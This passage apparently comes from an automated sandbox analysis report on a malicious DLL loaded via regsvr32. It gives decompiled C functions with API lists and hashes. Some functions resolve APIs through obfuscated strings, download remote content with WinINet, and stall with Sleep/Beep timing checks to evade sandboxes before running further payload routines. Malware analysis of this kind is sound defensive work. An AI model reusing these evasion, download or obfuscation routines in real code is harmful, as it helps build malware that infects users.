					_v10 = 0;
					_v76 = E6F842430(L"KERNEL32.dll", 0);
					_v72 = E6F843B30(E6F8443F0( &_v10));
					LoadLibraryA(_v72);
				}
				_v11 = 0;
				_v84 = E6F842640(L"KERNEL32.dll", 0);
				_v80 = E6F843BD0(E6F844F90( &_v11));
				_v88 = _v84(_v80);
				if(_v88 == 0) {
					_v12 = 0;
					_v96 = E6F842430(L"KERNEL32.dll", 0);
					_v92 = E6F843C10(E6F844A40( &_v12));
					LoadLibraryA(_v92);
				}
				_v13 = 0;
				_v104 = E6F842640(L"KERNEL32.dll", 0);
				_v100 = E6F843BB0(E6F845010( &_v13));
				_v108 = _v104(_v100);
				if(_v108 == 0) {
					_v14 = 0;
					_v116 = E6F842430(L"KERNEL32.dll", 0);
					_v112 = E6F843C30(E6F844AC0( &_v14));
					_v116(_v112);
				}
				_v15 = 0;
				_v124 = E6F842640(L"KERNEL32.dll", 0);
				_v120 = E6F843B70(E6F844510( &_v15));
				_v128 = _v124(_v120);
				if(_v128 == 0) {
					_v16 = 0;
					_v136 = E6F842430(L"Kernel32.dll", 0);
					_v132 = E6F843B90(E6F845200( &_v16));
					_v136(_v132);
				}
				return 1;
			}

0x6f845d9b
0x6f845da5
0x6f845daa
0x6f845dbc
0x6f845dc6
0x6f845dcd
0x6f845dd1
0x6f845de0
0x6f845df2
0x6f845df9
0x6f845df9
0x6f845dfe
0x6f845e0d
0x6f845e1f
0x6f845e29
0x6f845e30
0x6f845e34
0x6f845e43
0x6f845e55
0x6f845e5c
0x6f845e5c
0x6f845e61
0x6f845e70
0x6f845e82
0x6f845e8c
0x6f845e93
0x6f845e97
0x6f845ea6
0x6f845eb8
0x6f845ebf
0x6f845ebf
0x6f845ec4
0x6f845ed3
0x6f845ee5
0x6f845eef
0x6f845ef6
0x6f845efa
0x6f845f09
0x6f845f1b
0x6f845f22
0x6f845f22
0x6f845f27
0x6f845f36
0x6f845f48
0x6f845f52
0x6f845f59
0x6f845f5d
0x6f845f6c
0x6f845f7e
0x6f845f85
0x6f845f85
0x6f845f8a
0x6f845f99
0x6f845fab
0x6f845fb5
0x6f845fbc
0x6f845fc0
0x6f845fcf
0x6f845fe4
0x6f845feb
0x6f845feb
0x6f845ff6

APIs

LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845EBF
LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845F22

Strings

Kernel32.dll, xrefs: 6F845FC5
KERNEL32.dll, xrefs: 6F845DA0, 6F845DD6, 6F845E03, 6F845E39, 6F845E66, 6F845E9C, 6F845EC9, 6F845EFF, 6F845F2C, 6F845F62, 6F845F8F

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: LibraryLoad
String ID: KERNEL32.dll$Kernel32.dll
API String ID: 1029625771-1263921953
Opcode ID: a53251786990ada07ae704f3b510e4ac8dfb0528a348271fcb933bfbac7f449a
Instruction ID: a1940832c835b5b2614a1ceaa320f32556093bfbb275923765f7b1aac98d59ab
Opcode Fuzzy Hash: a53251786990ada07ae704f3b510e4ac8dfb0528a348271fcb933bfbac7f449a
Instruction Fuzzy Hash: 6271E570E1435CAFCF14DBF8D855BDEBBB1AF48308F1049A9E006AF291EB745A058B91

Uniqueness

Uniqueness Score: -1.00%

Function 6F846000 Relevance: 6.1, APIs: 4, Instructions: 128
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E6F846000(char* _a4) {
				char* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char* _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void _v1092;
				char* _t67;
				void* _t103;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v32 = E6F842400(0, 0);
				_v36 = _v32(_a4, 1, 0);
				if(_v36 != 0) {
					_v40 = E6F842610(0, 0);
					_v16 = _v40(0, 0, 0, 0, 0);
					__eflags = _v16;
					if(_v16 != 0) {
						_v44 = E6F8426A0(0, 0);
						_v20 = InternetOpenUrlA(_v16, _a4, 0, 0, 0x84000000, 0);
						__eflags = _v20;
						if(_v20 != 0) {
							do {
								_v52 = E6F8424F0(0, 0);
								InternetReadFile(_v20,  &_v1092, 0x400,  &_v12);
								_push( &(_v8[_v12])); // executed
								_t67 = E6F848E3F( &_v1092, __eflags); // executed
								_v56 = _t67;
								_v28 = _v56;
								E6F847040(_v28, _v24, _v8);
								E6F847040(_v28 + _v8,  &_v1092, _v12);
								_v60 = _v24;
								L6F848E48(_v60); // executed
								_t103 = _t103 + 8;
								_v24 = _v28;
								_v8 =  &(_v8[_v12]);
								__eflags = _v12;
							} while (_v12 != 0);
							_v64 = E6F8423A0(0, 0);
							InternetCloseHandle(_v20);
							_v68 = E6F8423A0(0, 0);
							_v68(_v16);
							return _v24;
						}
						_v48 = E6F8423A0(0, 0);
						_v48(_v16);
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x6f846009
0x6f846010
0x6f846017
0x6f84601e
0x6f846025
0x6f846035
0x6f846043
0x6f84604a
0x6f84605c
0x6f84606c
0x6f84606f
0x6f846073
0x6f846085
0x6f84609e
0x6f8460a1
0x6f8460a5
0x6f8460c1
0x6f8460ca
0x6f8460e1
0x6f8460ea
0x6f8460eb
0x6f8460f3
0x6f8460f9
0x6f846108
0x6f84611f
0x6f846127
0x6f84612e
0x6f846133
0x6f846139
0x6f846142
0x6f846145
0x6f846145
0x6f846158
0x6f84615f
0x6f84616b
0x6f846172
0x00000000
0x6f846175
0x6f8460b0
0x6f8460b7
0x00000000
0x6f8460ba
0x00000000
0x6f846075
0x00000000

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6F846040

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: CheckConnectionInternet
String ID:
API String ID: 3847983778-0
Opcode ID: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
Instruction ID: d1d482223b69bb8edfc3ff731b2323e63fd9376ae674a3e03f24be461842c739
Opcode Fuzzy Hash: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
Instruction Fuzzy Hash: 4C4195B5E4430CBFDB14DFE8C845BEEBBB4AF48705F104999E605BB280D7746A408BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F84DB13 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E6F84DB13(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t5;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6f85c110; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F84DF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t5 = E6F84DC48(1, 0x364); // executed
						_t18 = _t5;
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t18);
							if(__eflags != 0) {
								E6F84D7BE(_t18, 0x6f85d850);
								E6F84DC0E(0);
								goto L13;
							} else {
								_t13 = 0;
								E6F84DF59(__eflags,  *0x6f85c110, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6F84DF59(0,  *0x6f85c110, 0);
							_push(0);
							L9:
							E6F84DC0E();
							goto L4;
						}
					}
				} else {
					_t18 = E6F84DF1A(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6f85c110; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6f84db1e
0x6f84db20
0x6f84db25
0x6f84db28
0x6f84db46
0x6f84db49
0x6f84db4e
0x6f84db50
0x00000000
0x6f84db52
0x6f84db59
0x6f84db5e
0x6f84db62
0x6f84db64
0x6f84db89
0x6f84db8b
0x6f84dba4
0x6f84dbab
0x00000000
0x6f84db8d
0x6f84db8d
0x6f84db96
0x6f84db9b
0x00000000
0x6f84db9b
0x6f84db66
0x6f84db66
0x6f84db66
0x6f84db6f
0x6f84db74
0x6f84db75
0x6f84db75
0x00000000
0x6f84db7a
0x6f84db64
0x6f84db2a
0x6f84db30
0x6f84db34
0x6f84db41
0x00000000
0x6f84db36
0x6f84db39
0x6f84dbb3
0x6f84dbb3
0x6f84db3b
0x6f84db3b
0x6f84db3b
0x6f84db3d
0x6f84db3d
0x6f84db3d
0x6f84db39
0x6f84db34
0x6f84dbb6
0x6f84dbbe
0x6f84dbc7

APIs

GetLastError.KERNEL32(?,?,?,6F84D472,6F850290,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7,?,?), ref: 6F84DB18
_free.LIBCMT ref: 6F84DB75
_free.LIBCMT ref: 6F84DBAB
SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7,?,?,00000004), ref: 6F84DBB6

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6dc0190ed89fc767bf8dfee5fbd56b91385bfc391e691275fadc838d8f060ad3
Instruction ID: 86355a4d365e3836fbaf67cdd66dab757e14cbb148d9f0d690256097e9c2f444
Opcode Fuzzy Hash: 6dc0190ed89fc767bf8dfee5fbd56b91385bfc391e691275fadc838d8f060ad3
Instruction Fuzzy Hash: 1F11E173644B0C7BDB45467C8C84E1A225B9BC33F87200EE5F5349EAC1DF28C825CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F848A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6F848A90(void* __ecx, void* __eflags) {
				char _v5;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v304;
				signed char _t32;
				char _t46;
				char _t47;
				char _t48;

				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				_v12 = 0;
				_v28 = 0xa;
				_t32 = E6F845D90(__eflags); // executed
				if((_t32 & 0x000000ff) == 0) {
					L15:
					__eflags = 0;
					return 0;
				} else {
					_v5 = 0;
					_v36 = E6F8426D0(L"Kernel32.dll", 0);
					_v32 = E6F843D10(E6F844E80( &_v5));
					_v36(_v32,  &_v304, 0x100);
					_v20 =  *((intOrPtr*)(E6F842220(L"Kernel32.dll", 0)))();
					L2:
					if(_v12 < _v28) {
						_v40 = E6F8422E0(L"Kernel32.dll", 0);
						Sleep(0x1770);
						_v44 = E6F842580(L"Kernel32.dll", 0);
						Beep(0, 0xbb8);
						_v12 = _v12 + 1;
						goto L2;
					}
					_v16 =  *((intOrPtr*)(E6F842220(L"Kernel32.dll", 0)))();
					_v24 = _v16 - _v20;
					__eflags = _v24 - 0xd6d8;
					if(_v24 < 0xd6d8) {
						goto L15;
					}
					__eflags = _v12 - _v28;
					if(__eflags < 0) {
						goto L15;
					}
					_t46 = E6F847700(__eflags);
					__eflags = _t46;
					if(_t46 == 0) {
						return 1;
					}
					_t47 = E6F8469A0( &_v304); // executed
					__eflags = _t47;
					if(_t47 != 0) {
						_t48 = E6F847670(); // executed
						__eflags = _t48;
						if(__eflags == 0) {
							_v48 = E6F847770();
							__eflags = _v48 - 1;
							if(_v48 == 1) {
								__eflags = E6F8471E0();
								if(__eflags == 0) {
									E6F846390(__eflags);
								} else {
									E6F846390(__eflags);
								}
							}
						} else {
							E6F846390(__eflags); // executed
						}
					}
					goto L15;
				}
			}

0x6f848a99
0x6f848aa0
0x6f848aa7
0x6f848aae
0x6f848ab5
0x6f848abc
0x6f848ac6
0x6f848bd9
0x6f848bd9
0x00000000
0x6f848acc
0x6f848ace
0x6f848add
0x6f848aef
0x6f848b02
0x6f848b13
0x6f848b16
0x6f848b1c
0x6f848b2a
0x6f848b32
0x6f848b41
0x6f848b4b
0x6f848b54
0x00000000
0x6f848b54
0x6f848b67
0x6f848b70
0x6f848b73
0x6f848b7a
0x00000000
0x00000000
0x6f848b7f
0x6f848b82
0x00000000
0x00000000
0x6f848b84
0x6f848b89
0x6f848b8b
0x00000000
0x6f848b8d
0x6f848b9d
0x6f848ba2
0x6f848ba4
0x6f848ba6
0x6f848bab
0x6f848bad
0x6f848bbb
0x6f848bbe
0x6f848bc2
0x6f848bc9
0x6f848bcb
0x6f848bd4
0x6f848bcd
0x6f848bcd
0x6f848bcd
0x6f848bcb
0x6f848baf
0x6f848baf
0x6f848baf
0x6f848bad
0x00000000
0x6f848ba4

APIs

Part of subcall function 6F845D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845EBF

Sleep.KERNEL32(00001770,Kernel32.dll,00000000), ref: 6F848B32
Beep.KERNEL32(00000000,00000BB8,Kernel32.dll,00000000), ref: 6F848B4B

Strings

Kernel32.dll, xrefs: 6F848AD3, 6F848B07, 6F848B20, 6F848B37, 6F848B5B

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: BeepLibraryLoadSleep
String ID: Kernel32.dll
API String ID: 1352138507-1926710522
Opcode ID: fc780f837629ca163c3740db5313b4e8c2b6a56102a41d46683a2cc6c63b928f
Instruction ID: 21a587792a9cc65cc71f2392e4c5ec6f4648099da91141f1d87972b4c446aeb0
Opcode Fuzzy Hash: fc780f837629ca163c3740db5313b4e8c2b6a56102a41d46683a2cc6c63b928f
Instruction Fuzzy Hash: 6731D8B0D4830DBEDB409BF88945BEEBAB4AF45308F104CD9D515BE580DBB496448BA6

Uniqueness

Uniqueness Score: -1.00%

Function 6F847670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E6F847670() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v524;
				intOrPtr _t12;
				intOrPtr _t21;

				_t21 =  *0x6f85caf0; // 0x6f85cb3c
				E6F841810(_t21,  &_v268, 0x100);
				_t12 =  *0x6f85caec; // 0x6f85cb50
				E6F841810(_t12,  &_v524, 0x100);
				_v8 = E6F842250(L"KERNEL32.dll", 0);
				_v8( &_v268,  &_v524);
				_v12 = E6F8425B0(L"Shlwapi.dll", 0);
				if(PathIsDirectoryA( &_v268) == 0) {
					return 0;
				}
				return 1;
			}

0x6f847685
0x6f84768c
0x6f84769d
0x6f8476a3
0x6f8476b4
0x6f8476c5
0x6f8476d4
0x6f8476e3
0x00000000
0x6f8476ec
0x00000000

APIs

PathIsDirectoryA.SHLWAPI(?,Shlwapi.dll,00000000), ref: 6F8476DE

Strings

KERNEL32.dll, xrefs: 6F8476AA
Shlwapi.dll, xrefs: 6F8476CA

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: DirectoryPath
String ID: KERNEL32.dll$Shlwapi.dll
API String ID: 1580926078-3851112466
Opcode ID: 03a8af96d4642d66ca38c3303adebac1e0240632b6df87b60f781fc95533587f
Instruction ID: 33944cd915e597f2510a0fbcaba48e7a8676e549ffb375fda9996a46aecf0b15
Opcode Fuzzy Hash: 03a8af96d4642d66ca38c3303adebac1e0240632b6df87b60f781fc95533587f
Instruction Fuzzy Hash: 9401817691430CBBDF91DBF88C45FCEB77C9B08700F0049D5A248EE180EEB4A6948BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F84FD93 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F84FD93(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6F84FD5C(_t26) - _t26 >> 1;
					_t7 = E6F84FCA5(0, 0, _t26, E6F84FD5C(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6F84E649(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6F84FCA5(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6F84DC0E(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x6f84fda2
0x6f84fda8
0x6f84fe03
0x6f84fe03
0x6f84fdaa
0x6f84fdb8
0x6f84fdbe
0x6f84fdc6
0x6f84fdcb
0x00000000
0x6f84fdcd
0x6f84fdce
0x6f84fdd3
0x6f84fdd8
0x6f84fdf8
0x6f84fdf2
0x6f84fdf2
0x6f84fdf4
0x6f84fdf4
0x6f84fdfb
0x6f84fe00
0x6f84fdcb
0x6f84fe07
0x6f84fe0a
0x6f84fe0a
0x6f84fe16

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F84FD9C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F84FE0A

Part of subcall function 6F84FCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6F84E286,6F8512A9,0000FDE9,00000000,?,?,?,6F851022,0000FDE9,00000000,?), ref: 6F84FD51

Part of subcall function 6F84E649: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6F850272,?,00000000,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7), ref: 6F84E67B

_free.LIBCMT ref: 6F84FDFB

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 045d09184ceef92e816290fe3f03f12b01b8aa0b277565a8f69443b55af207a7
Instruction ID: 8239b9efc693ec0651b762ca2c8e71663e3fbcd7cbe1389ae096f509f780cfd1
Opcode Fuzzy Hash: 045d09184ceef92e816290fe3f03f12b01b8aa0b277565a8f69443b55af207a7
Instruction Fuzzy Hash: 0401D472A0172D7F371146BF5C88DBB296DDDD29A831009ADB910DF141EB50DD0182F1

Uniqueness

Uniqueness Score: -1.00%

Function 6F841910 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F841910(void* _a4, long _a8, long _a12, long _a16) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = E6F848C90("VirtualAlloc", 0xd, 0xd);
				 *0x6f85c964 = E6F841490(_v8, "kernel32.dll", 0xd, 0xd);
				_v12 =  *0x6f85c964;
				return VirtualAlloc(_a4, _a8, _a12, _a16);
			}

0x6f841924
0x6f841939
0x6f841944
0x6f84195d

APIs

VirtualAlloc.KERNEL32(00003000,0000000D,0000000D,?,00000004,kernel32.dll,0000000D,0000000D,VirtualAlloc,0000000D,0000000D,00003000,00000004), ref: 6F841957

Strings

VirtualAlloc, xrefs: 6F84191A
kernel32.dll, xrefs: 6F84192B

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc$kernel32.dll
API String ID: 4275171209-2067260499
Opcode ID: 81074f12ff661b54a6a13cd5921a2b2caa6753463977aba530d0ec1833000579
Instruction ID: 5f5af325f23c065529e6076098beafdc531d4de5bd97415e6e5d49f07c0a9253
Opcode Fuzzy Hash: 81074f12ff661b54a6a13cd5921a2b2caa6753463977aba530d0ec1833000579
Instruction Fuzzy Hash: 02F01275645308BBCB40DFE8DD45F6E77B9AB49B04F004589BA05AB3C0D6709920CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F847010 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F847010(void* _a4) {
				void* _v8;
				intOrPtr _v12;

				_v12 = E6F8422B0(L"KERNEL32.dll", 0);
				_v8 = E6F8483B0();
				return RtlFreeHeap(_v8, 0, _a4);
			}

0x6f847022
0x6f84702a
0x6f84703d

APIs

RtlFreeHeap.NTDLL(6F85CC64,00000000,00000000,KERNEL32.dll,00000000,00000000,6F85CC64), ref: 6F847037

Strings

KERNEL32.dll, xrefs: 6F847018

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: KERNEL32.dll
API String ID: 3298025750-254546324
Opcode ID: 39caa41b904c936bd4bb35596485538ca0773ded79e525e903c422c5aeccbeaa
Instruction ID: c83b7431b980ba229ae707e1c200519276745f49332a498bf37c3af4a561a172
Opcode Fuzzy Hash: 39caa41b904c936bd4bb35596485538ca0773ded79e525e903c422c5aeccbeaa
Instruction Fuzzy Hash: 50D017B594430CBBCB00EFF88805B9EBB789B14301F1045A5AA04AF380DA71AA1087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8492F6 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E6F8492F6(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6F849960(__ebx, __edi, __esi);
				_t43 = E6F848F8C(__ecx, __edx, 0); // executed
				_t90 = 0x6f85a5d0;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6F848E91();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6f85cfc8;
					if( *0x6f85cfc8 != 0) {
						E6F849839(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6f85a5f0);
						E6F849960(1, __edi, __esi);
						_t48 =  *0x6f85cfec; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6f85cfec = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6F848E91();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6f85cfc8 - 2;
							if( *0x6f85cfc8 != 2) {
								E6F849839(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6f85a618);
								E6F849960(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6F8495B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6F8492A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_push(_t110);
											_push( *((intOrPtr*)(_t123 + 8)));
											_t56 = E6F849A40();
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_push(_t56);
													_push( *((intOrPtr*)(_t123 + 8)));
													_t59 = E6F849A40();
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6F8495B8( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6F8492A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
